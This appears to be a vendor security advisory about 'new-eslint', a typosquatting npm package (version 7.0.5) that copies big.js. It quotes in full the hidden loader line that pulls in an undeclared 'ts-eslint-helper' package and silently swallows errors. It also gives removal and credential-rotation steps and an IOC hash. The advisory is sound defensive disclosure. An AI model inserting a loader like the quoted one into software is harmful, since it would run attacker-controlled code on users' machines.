Which versions of new-eslint are malicious?

The following npm versions of new-eslint are flagged malicious: 7.0.5. Treat any of these as compromised.

How do I remediate new-eslint if I installed it?

Remove new-eslint from your project and lockfile, then assume any secrets accessible to the build or runtime were exposed: rotate API keys, tokens, and credentials, and audit for unexpected outbound network activity or persistence. Use O3 Security's dependency scanner to confirm the package and its artifacts are fully purged across your stack.

Is new-eslint part of a known attack campaign?

Yes — new-eslint is associated with the IN-MAL-2026-007067 campaign. Packages in the same campaign often share infrastructure and payloads, so check whether any related packages are also in your dependency tree.

Can O3 Security detect new-eslint in my codebase?

Yes. O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, blocking new-eslint and packages like it before any post-install script runs.

Malicious package

new-eslintnpm

Malicious code in new-eslint (npm) Remove it immediately and rotate any exposed credentials.

MAL-2026-6224

Immediate action

Remove the package, then rotate any secrets the build/runtime could reach.

npm uninstall new-eslint

What this malware does

Package is published as 'new-eslint' but ships a verbatim copy of MikeMcl/big.js, with a hidden loader injected mid-file between P.minus and P.mod in both big.js:605 and big.mjs:605: const helper = require("ts-eslint-helper"); helper.from_str().then(e => e).catch(e => { });. This require fires whenever a consumer imports or requires the package and silently swallows all errors. The required package ts-eslint-helper is not declared in package.json — the manifest lists a different package, [email protected] — so the loaded code is undeclared and attacker-mutable. The README claims 'no dependencies' and describes big.js, while the package name impersonates eslint tooling: classic typosquat lure plus hidden remote-controlled loader. Whatever ts-eslint-helper.from_str() does runs in the installer's process on import with no advertised functionality justifying it.

Malicious versions

1 flagged

7.0.5

Indicators of compromise (SHA-256)

6f068a5c7ad1a53c60d794a3b4585418956c176c42b8d5d90855e2ac60962b25

Frequently asked questions

No. new-eslint on npm has been identified as a malicious package (version 7.0.5 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-007067

References

npmjs.com

Credits

Amazon Inspector · finder

Scan your dependencies

O3 Security blocks malicious packages like this at install time and in CI.

Supply-chain protection